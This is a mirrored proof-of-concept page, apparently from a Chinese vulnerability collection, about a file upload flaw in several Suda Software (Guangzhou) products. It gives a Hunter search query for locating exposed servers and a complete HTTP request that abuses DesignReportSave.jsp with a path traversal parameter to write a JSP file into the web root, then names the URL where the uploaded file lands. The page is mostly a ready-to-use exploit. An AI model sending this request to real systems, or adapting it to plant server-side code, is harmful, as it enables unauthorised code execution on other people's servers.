mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 21:04:50 +08:00
49 lines
1.7 KiB
Markdown
49 lines
1.7 KiB
Markdown
|
|
# 速达软件技术(广州)有限公司多款产品存在文件上传漏洞
|
||
|
|
|
||
|
|
# 一、漏洞简介
|
||
|
|
速达软件技术(广州)有限公司多款产品存在文件上传漏洞
|
||
|
|
|
||
|
|
# 二、影响版本
|
||
|
|
+ 速达软件技术(广州)有限公司多款产品
|
||
|
|
|
||
|
|
# 三、资产测绘
|
||
|
|
+ hunter`web.body="速达软件技术(广州)有限公司"`
|
||
|
|
+ 特征
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
# 四、漏洞复现
|
||
|
|
```plain
|
||
|
|
GET /report/DesignReportSave.jsp?report=../stc.jsp HTTP/1.1
|
||
|
|
Host: xx.xx.xx.xx
|
||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
|
||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
Cookie: JSESSIONID=32A62132D706D2E2F3F66875BD5C012A
|
||
|
|
Upgrade-Insecure-Requests: 1
|
||
|
|
Content-Length: 68
|
||
|
|
|
||
|
|
<%@ page contentType="text/plain" %>
|
||
|
|
<%
|
||
|
|
out.print("test");
|
||
|
|
%>
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
上传文件位置
|
||
|
|
|
||
|
|
```plain
|
||
|
|
http://xx.xx.xx.xx/stc.jsp
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
> 更新: 2024-02-29 23:55:46
|
||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yapob2yebyvzwrrn>
|